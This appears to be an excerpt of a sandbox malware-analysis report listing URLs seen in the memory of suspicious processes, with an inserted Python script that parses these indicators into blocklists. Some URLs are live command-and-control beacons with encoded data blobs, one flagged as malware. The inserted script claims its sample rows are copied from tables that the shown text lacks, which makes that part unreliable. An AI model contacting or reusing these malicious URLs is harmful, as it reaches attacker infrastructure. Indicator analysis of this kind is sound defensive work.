http://www.anuts.top/li0t/ | true | Avira URL Cloud: safe | unknown
http://www.xn--fhq1c541j0zr.com/rm91/ | true | Avira URL Cloud: safe | unknown
http://www.helpers-lion.online/mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT | true | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR | true | Avira URL Cloud: safe | unknown
http://www.xn--fhq1c541j0zr.com/rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 | true | Avira URL Cloud: safe | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX | true | Avira URL Cloud: malware | unknown
http://www.catherineviskadi.com/qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX | true | Avira URL Cloud: safe | unknown
http://www.anuts.top/li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w | true | Avira URL Cloud: safe | unknown
http://www.telwisey.info/ei85/ | true | Avira URL Cloud: safe | unknown
http://www.gipsytroya.com/tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX | true | Avira URL Cloud: safe | unknown
http://www.helpers-lion.online/mooq/ | true | Avira URL Cloud: safe | unknown
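The Domains and URLs tables above are the report's indicator list, but as rendered in text the cells of each row run together (name, IP, the Active and Malicious flags, and the reputation land on consecutive lines, and the Malicious flag is glued onto the end of each URL). The Python below is an added example, not code from the Joe Sandbox report: it parses rows in that run-together form into records, lists the hosts the sandbox flagged as malicious together with the URLs seen on them, and reports query parameters that are identical across every parameterised URL (on this page that is fhW=BLvXr6e0EhyxeX, which recurs on every host). The sample rows are copied from the two tables above; the function names are mine.

```python
"""Turn Joe Sandbox 'Domains' and 'URLs' table rows into IOC records.

Added example; not part of the Joe Sandbox report. The sample rows are copied
from this report's tables in the run-together form a text dump gives them.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: three rows of the Domains table
# (Name / IP / Active+Malicious fused on one line / Reputation).
DOMAIN_ROWS = """\
www.sandranoll.com
213.145.228.16
truetrue
unknown
www.hprlz.cz
5.44.111.162
truefalse
unknown
www.fourgrouw.cfd
unknown
unknowntrue
unknown
"""

# Constructed sample: three rows of the URLs table. The URL line ends with the
# fused Malicious flag; the bullet line that follows is the scanner verdict.
URL_ROWS = """\
http://www.sandranoll.com/aroo/true
• Avira URL Cloud: malware
unknown
http://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEzfalse
• Avira URL Cloud: safe
unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeXtrue
• Avira URL Cloud: malware
unknown
"""

FLAGS = ("true", "false", "unknown")


def split_flags(cell):
    """Split a fused pair of flags: 'truetrue' -> ('true', 'true')."""
    for first in FLAGS:
        rest = cell[len(first):]
        if cell.startswith(first) and rest in FLAGS:
            return first, rest
    raise ValueError(f"unrecognised flag cell: {cell!r}")


def parse_domains(text):
    """One dict per four-line Domains row."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    rows = []
    for i in range(0, len(lines) - 3, 4):
        name, ip, flags, reputation = lines[i:i + 4]
        active, malicious = split_flags(flags)
        rows.append({"name": name,
                     "ip": None if ip == "unknown" else ip,
                     "active": active == "true",
                     "malicious": malicious == "true",
                     "reputation": reputation})
    return rows


# A URL cell is the URL immediately followed by the fused Malicious flag.
URL_CELL = re.compile(r"^(?P<url>https?://\S+?)(?P<malicious>true|false)$")


def parse_urls(text):
    """One dict per URLs row; the verdict comes from the bullet line after it."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    rows = []
    for i, ln in enumerate(lines):
        m = URL_CELL.match(ln)
        if not m:
            continue
        verdict = None
        if i + 1 < len(lines) and lines[i + 1].startswith("•"):
            verdict = lines[i + 1].split(":", 1)[1].strip()
        rows.append({"url": m["url"],
                     "host": urlsplit(m["url"]).hostname,
                     "malicious": m["malicious"] == "true",
                     "verdict": verdict})
    return rows


def query_params(url):
    """Split the query without URL-decoding (the blobs contain '+' and '/')."""
    query = urlsplit(url).query
    return dict(kv.partition("=")[::2] for kv in query.split("&") if kv)


def shared_params(urls):
    """Query parameters whose value is identical on every URL that has a query."""
    queried = [query_params(u["url"]) for u in urls if urlsplit(u["url"]).query]
    if not queried:
        return {}
    common = set(queried[0].items())
    for q in queried[1:]:
        common &= set(q.items())
    return dict(common)


def c2_candidates(domains, urls):
    """Hosts flagged malicious in either table, mapped to the URLs seen on them."""
    bad_hosts = {d["name"] for d in domains if d["malicious"]}
    by_host = {}
    for u in urls:
        if u["malicious"] or u["host"] in bad_hosts:
            by_host.setdefault(u["host"], []).append(u["url"])
    for host in bad_hosts - set(by_host):
        by_host[host] = []  # flagged in the Domains table, no URL captured
    return by_host


if __name__ == "__main__":
    domains, urls = parse_domains(DOMAIN_ROWS), parse_urls(URL_ROWS)
    print("shared query parameters:", shared_params(urls))
    for host, seen in c2_candidates(domains, urls).items():
        print(host, seen)
```

The host list is what goes into a blocklist; the shared parameter is the part worth turning into a network signature, since the per-host paths (/aroo/, /4hda/, /w6qg/) change while the fhW value does not. Note that www.hprlz.cz is dropped even though it appears in both tables: the sandbox marked neither the host nor the URL malicious, which is exactly the case a blocklist built from the raw host column alone would get wrong.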
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabclip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_autoclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/ac/?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://reg.ruclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.domaintechnik.at/data/gfx/dt_logo_parking.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssclip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.comclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://static.loopia.se/shared/images/additional-pages-hero-shape.webpclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/pics/29590/bg1.png)clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lanclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.ecosia.org/newtab/clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsclip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUHclip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
URL: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH
  Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/pics/28903/search.png)
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://cdn.consentmanager.net
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
  Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
  Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
URL: https://static.loopia.se/responsive/images/iOS-72.png
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png
  Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://static.loopia.se/shared/logo/logo-loopia-white.svg
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
